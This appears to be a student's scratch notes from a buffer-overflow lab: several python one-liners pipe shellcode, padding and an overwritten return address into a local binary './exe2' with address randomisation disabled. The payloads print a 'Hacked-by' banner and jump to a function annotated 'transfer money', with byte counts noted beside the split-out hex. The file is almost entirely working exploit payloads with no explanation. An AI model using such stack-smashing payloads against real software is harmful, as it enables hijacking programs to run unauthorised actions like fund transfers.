python -c "print '\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x16\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36\x5c\x6e' + '\x68\x8d\x84\x04\x08\xc3' + '\x90' * 52 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2

\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x16\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x20\x62\x79\x20\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36\x5c\x6e

\x68\x8d\x84\x04\x08\xc3				transfer money


\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36			hacked-by-eyigiter16

python -c "print '\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f' + '\x68\x8d\x84\x04\x08\xc3' + 'A' * 69 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2

\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f		37

\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36	52

python -c "print '\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36' + '\x68\x8d\x84\x04\x08\xc3' + 'A' * 54 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2


python -c "print '\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x68\x8d\x84\x04\x08\xc3\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36' + 'A' * 54 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2

python -c "print '\x68\x8d\x84\x04\x08\xc3' + '\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36' + 'A' * 54 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2

python -c "print '\xeb\x1e\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x68\x8d\x84\x04\x08\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff\x48\x61\x63\x6b\x65\x64\x2d\x62\x79\x2d\x65\x79\x69\x67\x69\x74\x65\x72\x31\x36' + 'A' * 55 + '\xfc\xd3\xff\xff'" | setarch `uname -m` -R ./exe2
